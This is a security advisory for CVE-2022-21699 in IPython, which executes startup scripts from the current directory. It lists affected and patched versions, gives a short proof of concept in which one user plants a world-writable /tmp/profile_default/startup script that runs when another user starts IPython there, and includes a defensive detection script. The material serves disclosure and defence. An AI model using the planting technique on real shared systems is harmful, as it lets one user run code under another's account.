IPython exploit
CVE-2022-21699 Execution with Unnecessary Privileges in ipython
Affected versions
< 5.11
>= 6.0.0, < 7.16.3
>= 7.17.0, < 7.31.1
>= 8.0.0, < 8.0.1
Patched versions
5.11
7.16.3
7.31.1
8.0.1
Description
This vulnerability stems from IPython executing untrusted files in the CWD. It allows one user to run code as another user.
Proof of concept
User1:
mkdir -m 777 /tmp/profile_default
mkdir -m 777 /tmp/profile_default/startup
echo 'print("stealing your private secrets")' > /tmp/profile_default/startup/foo.py
User2:
cd /tmp
ipython
User2 will see:
Python 3.9.7 (default, Oct 25 2021, 01:04:21)
Type 'copyright', 'credits' or 'license' for more information
IPython 7.29.0 -- An enhanced Interactive Python. Type '?' for help.
stealing your private secrets
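A defensive check for the condition shown above, as an added example that is not part of the advisory or of IPython's own code: it tests a version string against the affected ranges listed on this page and lists files under profile_default/startup in a given directory, flagging foreign ownership and a world-writable startup directory. The function names are hypothetical, and the temp-directory layout in demo() is constructed.

```python
import os
import re
import stat
import tempfile

# Affected ranges from this advisory: (inclusive lower, exclusive upper).
AFFECTED = [((0, 0, 0), (5, 11, 0)), ((6, 0, 0), (7, 16, 3)),
            ((7, 17, 0), (7, 31, 1)), ((8, 0, 0), (8, 0, 1))]

def is_affected(version):
    """True if an IPython version string falls in one of the affected ranges."""
    m = re.match(r"\d+(?:\.\d+)*", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    v = tuple(int(p) for p in m.group().split("."))
    v += (0,) * (3 - len(v))  # pad "8.0" to (8, 0, 0)
    return any(lo <= v < hi for lo, hi in AFFECTED)

def cwd_profile_findings(directory, my_uid=None):
    """List files in <directory>/profile_default/startup, the location the
    proof of concept plants a script in, with ownership and permission flags."""
    my_uid = os.getuid() if my_uid is None else my_uid
    startup = os.path.join(directory, "profile_default", "startup")
    if not os.path.isdir(startup):
        return []
    world_writable = bool(os.stat(startup).st_mode & stat.S_IWOTH)
    findings = []
    for name in sorted(os.listdir(startup)):
        path = os.path.join(startup, name)
        st = os.lstat(path)  # lstat: report the entry itself, not a link target
        if stat.S_ISREG(st.st_mode):
            findings.append({"path": path,
                             "foreign_owner": st.st_uid != my_uid,
                             "dir_world_writable": world_writable})
    return findings

def demo():
    """Constructed sample: rebuild the PoC layout in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        startup = os.path.join(root, "profile_default", "startup")
        os.makedirs(startup)
        os.chmod(startup, 0o777)  # same mode as `mkdir -m 777` in the PoC
        with open(os.path.join(startup, "foo.py"), "w") as fh:
            fh.write('print("placeholder startup script")\n')
        return [(os.path.basename(f["path"]), f["foreign_owner"],
                 f["dir_world_writable"]) for f in cwd_profile_findings(root)]

if __name__ == "__main__":
    print("7.29.0 affected:", is_affected("7.29.0"))
    print(demo())
```

Calling cwd_profile_findings(os.getcwd()) before starting IPython in a shared directory reports the same condition on a real system.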
Patched release and documentation
See https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699
Versions 8.0.1 and 7.31.1 are recommended for current Python versions.
Version 7.16.3 has also been published for Python 3.6 users,
and version 5.11 (source only, 5.x branch on GitHub) for older Python versions.
References
- GHSA-pq7m-3gw7-gq5x
- ipython/ipython@46a51ed
- https://ipython.readthedocs.io/en/stable/whatsnew/version8.html#ipython-8-0-1-cve-2022-21699
- https://nvd.nist.gov/vuln/detail/CVE-2022-21699
- https://lists.debian.org/debian-lts-announce/2022/01/msg00021.html
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CRQRTWHYXMLDJ572VGVUZMUPEOTPM3KB/
- https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZ7LVZBB4D7KVSFNEQUBEHFO3JW6D2ZK/